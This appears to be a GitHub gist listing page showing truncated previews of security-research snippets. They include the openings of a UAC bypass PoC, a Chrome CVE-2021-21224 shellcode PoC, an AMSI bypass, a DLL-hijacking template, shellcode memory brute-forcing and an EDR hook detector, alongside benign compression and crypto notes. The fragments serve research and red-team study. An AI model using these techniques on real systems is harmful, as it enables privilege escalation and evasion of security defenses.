Skip to content

Instantly share code, notes, and snippets.

View odzhan's full-sized avatar

odzhan

712 followers · 85 following
View GitHub Profile
@antonioCoco
antonioCoco / TaskManagerSecret.c
Created August 29, 2023 01:52
/*
TaskManagerSecret
Author: @splinter_code
This is a very ugly POC for a very unreliable UAC bypass through some UI hacks.
The core of this hack is stealing and using a token containing the UIAccess flag set.
A trick described by James Forshaw, so all credits to him --> https://www.tiraniddo.dev/2019/02/accessing-access-tokens-for-uiaccess.html
From there it uses a task manager "feature" to run a new High IL cmd.exe.
This has been developed only for fun and shouldn't be used due to its high unreliability.
@z0rs
z0rs / Red-Teaming-tool.md
Last active May 18, 2024 06:41
@DavidBuchanan314
DavidBuchanan314 / stegflate_decode.py
Last active May 17, 2022 02:50
import zlib
import io
import sys
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
def parse_png_chunk(stream):
size = int.from_bytes(stream.read(4), "big")
ctype = stream.read(4)
body = stream.read(size)
@ManDeJan
ManDeJan / decompress.asm
Last active April 4, 2023 03:38
decompress.asm
.cpu cortex-m3
.syntax unified @ this is important, you won't get most of thumb-2 otherwise
.text
@ this file contains a assembly version of a lz decoder for cpse1 at the hogeschool utrecht
@ it's done in 15 instructions / 40 bytes, 20% less then what the best compiler did :)
@ compiler benchmarks
@ clang (trunk)
@ -O0 124 bytes
@aaaddress1
aaaddress1 / memBruteforce.cpp
Last active February 20, 2024 11:16
Windows 32-bit Shellcode Design without TEB & fs:30h
// memBruteforce.cpp by aaaddress1@chroot.org
// brute search loaded moudules in memory
// rewrite from https://www.exploit-db.com/exploits/45293
#include <Windows.h>
#include <iostream>
#pragma warning(disable:4996)
bool isMemExist(size_t addr) {
int retv;
__asm {
@wdormann
wdormann / CVE-2021-21224.html
Last active October 31, 2022 22:01
Sample ARM64 PoC for CVE-2021-21224
<script>
function gc() {
for (var i = 0; i < 0x80000; ++i) {
var a = new ArrayBuffer();
}
}
let shellcode = [
// Move x18 to x28 (TEB)
@mjosaarinen
mjosaarinen / cmov_vs_ct.txt
Created April 13, 2021 08:35
CMOV vs Constant-Time
Markku-Juhani O. Saarinen <mjos@pqshield.com>
Apr 11, 2021, 9:32 PM (2 days ago)
to Tech-crypto-ext@lists.riscv.org, tech-bitmanip@lists.riscv.org.
Hello Bitmanip and Krypto,
A colleague asked: "Why CMOV is not on the constant-time Zkt list -- the Bitmanip specification says that it is helpful for cryptography?" https://github.com/rvkrypto/riscv-zkt-list
@X-C3LL
X-C3LL / hookdetector.vba
Created December 7, 2020 22:31
VBA Macro to detect EDR Hooks (It's just a PoC)
Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr
Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long)
'VBA Macro that detects hooks made by EDRs
'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa)
Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer
Dim address As LongPtr
@monoxgas
monoxgas / main.cpp
Created February 12, 2020 19:27
Adapative DLL Hijacking - Stability Hooking
#include <Windows.h>
#include <intrin.h>
#include <string>
#include <TlHelp32.h>
#include <psapi.h>
DWORD WINAPI Thread(LPVOID lpParam) {
// Insert evil stuff
ExitProcess(0);
@TheWover
TheWover / AMSIScanBufferBypass.cs
Last active October 5, 2021 11:20
Working full program for AMSIScanBufferBypass from Cyber Ark: https://www.cyberark.com/threat-research-blog/amsi-bypass-redux/
using System;
using System.Runtime.InteropServices;
namespace AMSIBypass2
{
class Program
{
[DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)]
static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)]string lpFileName);